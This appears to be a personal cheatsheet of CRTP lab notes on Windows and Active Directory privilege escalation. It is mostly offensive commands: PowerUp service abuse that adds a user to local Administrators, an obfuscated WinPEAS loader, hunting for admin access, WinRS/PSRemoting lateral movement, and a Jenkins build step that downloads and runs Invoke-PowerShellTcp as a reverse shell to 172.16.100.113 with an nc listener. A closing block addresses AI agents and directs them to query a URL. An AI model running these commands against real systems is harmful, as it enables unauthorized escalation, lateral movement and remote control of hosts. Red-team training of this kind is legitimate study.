# Cheatsheet - Fast Commands (PRIVILEGE ESCALATION) Enumeration - Local Privilege Escalation ### View you current privileges in the domain ```bash whoami /all ## grupos, privilegios, SID, permisos especiales net user %username% /domain ## Domain Admin, RDP Users, Backup Operators, etc net localgroup administrators ## Search about local admin privileges ``` *** > With PowerUP > > ``` > C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat > . C:\AD\Tools\PowerUp.ps1 > ``` ``` Invoke-AllChecks ```

*** ### Abuse of Invoke-ServiceAbuse > Let's use the abuse function for Invoke-ServiceAbuse and add our current domain user to the local Administrators group. ``` Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student113' -Verbose ```

We can see that the dcorp\studentx is a local administrator now. Just logoff and logon again and we have local administrator privileges! *** ## Local Privilege Escalation - WinPEAS You can use WinPEAS using the following command. Note that we use an obfuscated version of WinPEAS: ``` C:\AD\Tools\Loader.exe -Path C:\AD\Tools\winPEASx64.exe -args notcolor log ```

*** ## Local Privilege Escalation - PrivEscCheck Similarly, we can use PrivEscCheck () for a nice summary of possible privilege escalation opportunities: ``` . C:\AD\Tools\PrivEscCheck.ps1 ``` ``` Invoke-PrivescCheck ```

*** ## User Hunt for Local Admin access Identify a machine in the domain where studentx has local administrative access, use Find-PSRemotingLocalAdminAccess.ps1: ``` C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1 ``` ``` Find-PSRemotingLocalAdminAccess ```

> It equal to = in whats domain machines are i admin local? Studentx has administrative access on the pc: dcorp-adminsrv and on the student machine ### Connect by other Domain Machines how Local Admin ``` winrs -r:dcorp-adminsrv cmd ```

``` set username set computername ```

*** ### PowerShell Remoting > Note: Remember use a new invishell > > ``` > C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat > . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1 > ``` ``` ## Search Find-PSRemotingLocalAdminAccess ## Conect winrs -r:dcorp-adminsrv cmd ### or Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local ## After $env:username ```

*** ## Abuse Jenkins Instance If we get a jenkins intance/login, try to login with username:usernarme pass Once you are in it, modificate/create a new proyect and insert the revershell command -->

``` powershell.exe iex (iwr http://172.16.100.113/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.113 -Port 443 ``` > Double check the following: > > 1. Remember to host the reverse shell on a local web server on your student VM. You can find hfs.exe in the C:\AD\Tools directory of your student VM. Note that HFS goes in the system tray when minimized. You may like to click the up arrow on the right side of the taskbar to open the system tray and double-click on the HFS icon to open it again. > 2. Also, make sure to add an exception or turn off the firewall on the student VM. > 3. Check if there is any typo or extra space in the Windows Batch command that you used above in the Jenkins project. > 4. After you build the project below, check the 'Console Output' of the Jenkins Project to know more about the error. ### Share a folder with Invoke-PowerShellTcp Fristly, execute HFS to enable the share -->

After, upload the Invoke-PowerShellTcp.ps1 -->

> Note: There is the route to copy and paste in the command: > > powershell.exe iex (iwr ****** -UseBasicParsing); ... Once we have the payload and share run, remember to host turn off the Windows Firewall

Once all it's done, weak up the NetCat and run the build --> ``` C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443 ```

> Note: I dont need disable anything. If you have issues, reboot the machine

We can now run commands on the reverse shell: ``` $env:username ``` ``` ipconfig ``` ``` $env:computername ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/crtp-certified-red-team-professional/cheatsheet-fast-commands-privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.